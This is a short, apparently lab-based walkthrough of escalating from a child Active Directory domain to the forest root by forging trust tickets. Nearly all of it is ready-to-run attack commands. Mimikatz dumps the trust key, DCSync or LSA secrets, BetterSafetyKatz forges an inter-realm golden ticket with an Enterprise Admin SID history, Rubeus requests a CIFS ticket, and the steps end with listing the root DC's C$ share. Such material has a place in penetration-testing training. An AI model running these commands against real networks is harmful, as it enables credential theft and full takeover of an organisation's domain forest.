Using Trust Tickets

Child to Parent using Trust Tickets

We will extract the trust key, and then forge an inter-realm TGT where we inject a SID History of Enterprise Admin.

  1. To extract trust tickets, look for [In] trust key from child to parent.

Invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName dcorp-dc

OR run DCSync to extract

Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\mcorp$"'

OR extract all the secrets from DC

Invoke-Mimikatz -Command '"lsadump::lsa /patch"'
  1. Now, we can forge the inter-realm TGT using the trust key obtained. Note: Unless, explicitly specified, across trusts (within or across forests), AES is not supported. RC4 is supported.

C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /sids:S-1-5-21-335606122-960912869-3279953914-519 /rc4:e9ab2e57f6397c19b62476e98e9521ac /service:krbtgt /target:moneycorp.local /ticket:C:\AD\Tools\trust_tkt.kirbi" "exit"
  1. Now we can request a TGS from parent DC to access a service (CIFS) on DC on the parent root DC.

Rubeus.exe asktgs /ticket:C:\AD\Tools\kekeo_old\trust_tkt.kirbi /service:cifs/mcorp-dc.moneycorp.local /dc:mcorp-dc.moneycorp.local /ptt
  1. We can now access forest root DC.

ls \\mcorp-dc.moneycorp.local\c$

Last updated